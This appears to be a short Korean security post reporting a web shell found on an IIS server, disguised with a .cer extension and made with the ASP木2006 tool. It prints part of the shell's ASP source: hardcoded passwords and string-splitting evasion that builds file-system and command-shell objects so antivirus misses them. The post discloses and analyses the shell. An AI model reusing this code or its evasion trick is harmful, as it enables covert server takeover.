IIS 웹 서버의 asp.dll 파일에 맵핑되어 있는 cer 확장자로 위장된 웹쉘이 발견되었습니다. 이 웹쉘은 ASP木2006 툴로 제작된 것으로 바이러스토탈 사이트에서 검사 결과, 우회코드로 인하여 일부 백신에서만 탐지하는 것으로 확인되었습니다.
--- top.cer 웹 쉘 일부 내용 ( 우회코드 ) -----
Const m = "xl"
Const showLogin = "xl"
Const clientPassword = "#"
Const dbSelectNumber = 10
Const isDebugMode = False
Const myName = "??去了"
Const notdownloadsExists = False
Const userPassword = "xiaonong"
Const MyCmdDoTExeFiLe = "cOmmaNd.coM"
ConSt strJSCloSeMe = "<inPut tYpe=butTon vAluE=' ?? ' onClick='wiNdow.cloSe();'>"Sub creAteIT(fSoX, SaX, wSX)
If isDebugMode = False Then
On Error Resume Next
End IfSet fsoX = Server.CreateObject("Scripting.FileSy"&x&"stemObject")
If IsEmpty(fsoX) And (pagename = "FsoFile"&x&"Explorer" Or theAct = "fsoSe"&x&"arch") Then
Set fsoX = fso
End IfSet saX = Server.CreateObject("Shell.Ap"&x&"plication")
If IsEmpty(saX) And (pagename = "AppFileExplorer" Or pagename = "Sa"&x&"CmdRun" Or theAct = "saSe"&x&"arch") Then
Set saX = sa
End IfSet wsX = Server.CreateObject("WScrip"&x&"t.Shell")
If IsEmpty(wsX) And (pagename = "WsCm"&x&"dRun" Or theAct = "getTermina"&x&"lInfo" Or theAct = "readR"&x&"eg") Then
Set wsX = ws
End IfIf Err Then
Err.Clear
End If
End Sub
----------------------
카스퍼스카이가 못 잡다니..... 예상 밖이네요..